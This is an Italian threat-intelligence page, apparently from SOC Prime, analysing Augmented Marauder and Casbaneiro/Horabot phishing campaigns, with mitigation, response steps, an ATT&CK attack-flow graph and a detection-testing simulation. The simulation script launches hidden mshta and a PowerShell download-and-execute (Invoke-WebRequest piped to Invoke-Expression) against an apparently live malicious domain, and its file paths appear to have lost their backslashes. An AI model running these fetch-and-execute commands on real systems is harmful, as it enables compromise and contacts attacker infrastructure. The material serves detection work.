SOC Prime Bias: Alta

07 Apr 2026 18:09
newspaper icon BlueVoyant

Analisi delle campagne multi-frontispizio di Augmented Marauder e Casbaneiro

Author Photo
Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime linkedin icon Segui
Analisi delle campagne multi-frontispizio di Augmented Marauder e Casbaneiro
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Indagine

I ricercatori hanno ricostruito la catena end-to-end dall’allegato iniziale all’esecuzione del payload finale. Hanno analizzato uno stadio HTA che innesca mshta.exe, seguito da un loader JavaScript/VBScript a due fasi e componenti AutoIT utilizzati per decrittare contenitori crittografati AES con un valore seme codificato. L’analisi statica ha confermato la presenza di binari Horbot e Casbaneiro, insieme a logiche anti-analisi che verificano i nomi utente delle sandbox e gli artefatti relativi alle VM. Le osservazioni di rete hanno mostrato un’infrastruttura C2 fronteggiata da domini protetti da Cloudflare e una API PHP utilizzata per generare PDF dinamici per vittima durante la fase di delivery.

Mitigazione

Bloccare o controllare strettamente l’esecuzione di mshta.exe per contenuti non attendibili e rafforzare l’ispezione degli allegati per catene basate su ZIP/HTA/script. Monitorare un comportamento anomalo di PowerShell che interagisce con oggetti COM di Outlook, che può indicare propagazione tramite casella di posta. Al livello di rete, bloccare o allertare sui domini malevoli e sugli indirizzi IP identificati e applicare il filtraggio URL per limitare l’accesso ai servizi di generazione PDF utilizzati per il staging. Utilizzare la lista di autorizzazioni delle applicazioni per impedire l’esecuzione di interpreti AutoIT senza approvazione esplicita.

Risposta

Quando viene rilevata un’attività, isolare l’endpoint, interrompere i processi mshta.exe e PowerShell sospetti, e rimuovere i nuovi artefatti creati, in particolare i file collocati nelle directory pubbliche. Raccogliere le fasi HTA, VBS e AutoIT per la revisione forense, quindi effettuare una caccia a staticdata.dll e at.dll attraverso gli host interessati. Reimpostare le credenziali per gli account email compromessi, disabilitare l’automazione COM di Outlook o le regole malevoli e aggiornare i contenuti di rilevazione con IOCs estratti monitorando l’espansione laterale e il phishing successivo da caselle di posta violate.

Parole chiave: Augmented Marauder, Water Saci, Casbaneiro, Horbot, America Latina, phishing spagnolo, esca WhatsApp, ClickFix, HTA, mshta.exe, VBScript, caricatore JavaScript, AutoIT, PowerShell, Outlook COM, decrittazione AES, UUID ZIP, PDF protetto da password, Cloudflare C2, API PHP, trojan bancario, acquisizione account email.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6e6 classDef process fill:#ffdd99 classDef malware fill:#ff9999 classDef persistence fill:#ccffcc classDef c2 fill:#ffcc99 classDef operator fill:#ff9900 %% Node definitions action_phish_attach["<b>Azione</b> – <b>T1566.001 Phishing: Spearphishing Allegato</b><br/>Email malevola con PDF protetto da password mascherata da convocazione giudiziaria"] class action_phish_attach action action_phish_link["<b>Azione</b> – <b>T1566.002 Phishing: Spearphishing Link</b><br/>Link nel PDF che innesca il download automatico di un file ZIP con nome UUID casuale"] class action_phish_link action file_zip["<b>File</b> – Archivio ZIP<br/>Contiene file HTA"] class file_zip file file_hta["<b>File</b> – File HTA<br/>Eseguito tramite mshta.exe"] class file_hta file process_mshta["<b>Processo</b> – mshta.exe<br/>Carica JavaScript che recupera il VBScript di seconda fase"] class process_mshta process script_vb["<b>Azione</b> – <b>T1059.005 Interprete di Comandi e Scripting: Visual Basic</b><br/>Controlli sandbox e download del payload"] class script_vb malware action_sandbox_evasion["<b>Azione</b> – <b>T1497.002 Evasione Virtualizzazione/Sandbox</b><br/>Controlli basati sull’attività dell’utente per nomi utente sandbox e artefatti VM"] class action_sandbox_evasion action action_deobfuscation["<b>Azione</b> – <b>T1140 Deoffuscare/Decodificare File o Informazioni</b><br/>Deoffuscazione runtime di stringhe e codice"] class action_deobfuscation action script_powershell["<b>Azione</b> – <b>T1059.001 Interprete di Comandi e Scripting: PowerShell</b><br/>Scarica l’interprete AutoIT e raccoglie contatti Outlook"] class script_powershell malware tool_outlook["<b>Strumento</b> – Oggetti COM di Outlook<br/>Rastrellare la rubrica per la propagazione email"] class tool_outlook tool tool_autoit["<b>Strumento</b> – AutoIT<br/>Script compilati producono payload crittografati"] class tool_autoit tool action_compile["<b>Azione</b> – <b>T1027.004 File od Informazioni Offuscate: Compilare Dopo la Consegna</b><br/>I payload vengono compilati sull’host prima dell’esecuzione"] class action_compile action malware_dll["<b>Malware</b> – DLL crittografate (staticdata.dll, at.dll)"] class malware_dll malware process_reflect_load["<b>Processo</b> – Caricamento DLL Riflettivo<br/>Carica DLL direttamente in memoria senza scriverle su disco"] class process_reflect_load process action_injection["<b>Azione</b> – <b>T1055.001 Iniezione di Processo: Iniezione DLL</b><br/>DLL caricati riflessivamente iniettati nei processi"] class action_injection action persistence_shortcut["<b>Persistenza</b> – <b>T1547.009 Modifica Collegamento</b><br/>LNK posizionato nella cartella Avvio"] class persistence_shortcut persistence c2_communication["<b>C2</b> – <b>T1102 Servizio Web</b><br/>HTTP GET/POST tramite domini protetti da Cloudflare"] class c2_communication c2 tool_turo["<b>Strumento</b> – Turo.exe (compilato AutoIT)"] class tool_turo tool tool_tekojac["<b>Strumento</b> – Tekojac.exe (Auto2Exe)"] class tool_tekojac tool action_masquerade["<b>Azione</b> – <b>T1036.008 Mascheramento</b><br/>File PDF e ZIP sembrano legittimi"] class action_masquerade action %% Connections action_phish_attach –>|consegna| file_zip file_zip –>|contiene| file_hta file_hta –>|eseguito da| process_mshta process_mshta –>|carica| script_vb script_vb –>|svolge| action_sandbox_evasion action_sandbox_evasion –>|porta a| action_deobfuscation action_deobfuscation –>|rivela| script_powershell script_powershell –>|usa| tool_outlook script_powershell –>|scarica| tool_autoit tool_autoit –>|produce| action_compile action_compile –>|genera| malware_dll malware_dll –>|caricato da| process_reflect_load process_reflect_load –>|permette| action_injection action_injection –>|inietta in| process_mshta action_injection –>|abilita| persistence_shortcut persistence_shortcut –>|mantiene| c2_communication script_powershell –>|scarica| tool_turo script_powershell –>|scarica| tool_tekojac action_masquerade –>|copre| action_phish_attach action_masquerade –>|copre| action_phish_link %% Styling class action_phish_attach action class action_phish_link action class file_zip file class file_hta file class process_mshta process class script_vb malware class action_sandbox_evasion action class action_deobfuscation action class script_powershell malware class tool_outlook tool class tool_autoit tool class action_compile action class malware_dll malware class process_reflect_load process class action_injection action class persistence_shortcut persistence class c2_communication c2 class tool_turo tool class tool_tekojac tool class action_masquerade action "

Flusso di Attacco

Esecuzione di Simulazione

Prerequisito: Il controllo pre-volo Telemetria & Baseline deve essere passato.

Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare esattamente la telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa e Comandi di Attacco:
    L’attore della minaccia mira a stabilire una presenza su una workstation della vittima sfruttando Mshta per scaricare ed eseguire un payload HTA malevolo ospitato su https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK. Subito dopo, l’attore utilizza PowerShell per scaricare uno script di seconda fase dallo stesso dominio tramite Invoke‑WebRequest e lo esegue in memoria. Entrambi i binari sono lanciati da un prompt dei comandi con privilegi elevati per aumentare la probabilità di registrazione degli audit.

  • Script di Test di Regressione:

    # Simulazione Horabot – attiva sia mshta che PowerShell nella stessa sessione
# 1. Avvia Mshta con URL malevolo
$htaUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK"
Start-Process -FilePath "$env:SystemRootsystem32mshta.exe" -ArgumentList $htaUrl -WindowStyle Hidden

# 2. Avvia PowerShell per scaricare ed eseguire uno script remoto
$psUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK/payload.ps1"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Invoke-WebRequest -Uri '$psUrl' -UseBasicParsing | Invoke-Expression`"" `
    -WindowStyle Hidden

  • Comandi di Pulizia:

    # Termina eventuali processi malevoli in sospeso (se sono sopravvissuti)
Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Rimuovi eventuali file che potrebbero essere stati scaricati (posizioni di esempio)
$paths = @(
    "$env:TEMPpayload.ps1",
    "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.hta"
)
foreach ($p in $paths) {
    if (Test-Path $p) { Remove-Item -Path $p -Force }
}

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis